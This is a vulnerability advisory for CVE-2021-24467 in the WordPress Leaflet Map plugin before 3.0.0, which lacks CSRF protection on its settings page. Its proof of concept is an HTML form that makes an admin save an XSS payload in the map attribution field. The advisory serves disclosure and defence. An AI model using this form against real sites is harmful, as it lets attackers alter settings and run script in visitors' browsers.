WordPress Plugin Vulnerabilities

Leaflet Map < 3.0.0 - Arbitrary Settings Update via CSRF Leading to Stored XSS

Description

The plugin does not verify the CSRF nonce when saving its settings, which allows attackers to make a logged in admin update the settings via a Cross-Site Request Forgery attack. This could lead to Cross-Site Scripting issues by either changing the URL of the JavaScript library being used, or using malicious attributions which will be executed in all page with an embed map from the plugin

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/[email protected]/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/[email protected]/dist/leaflet.css" />
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/[email protected]/togeojson.js" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
leaflet-map
Fixed in 3.0.0

References

CVE
CVE-2021-24467

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
ac32d265-066e-49ec-9042-3145cd99e2e8

Timeline

Publicly Published
2021-07-01 (about 2 years ago)
Added
2021-07-07 (about 2 years ago)
Last Updated
2022-02-13 (about 1 years ago)

Other

Published
Title
Published
2023-11-06
Title
ImageMapper <= 1.2.6 - Settings Update via CSRF
Published
2014-09-19
Title
Improved User Search in Backend < 1.2.6 - CSRF & XSS
Published
2022-12-02
Title
Chained Quiz < 1.3.2.5 - Submitted Quiz Response Deletion via CSRF
Published
2023-08-30
Title
Simple 301 Redirects < 2.0.8 - Cross-Site Request Forgery via 'clicked'
Published
2023-03-14
Title
CF7 Invisible reCAPTCHA < 1.3.4 - CSRF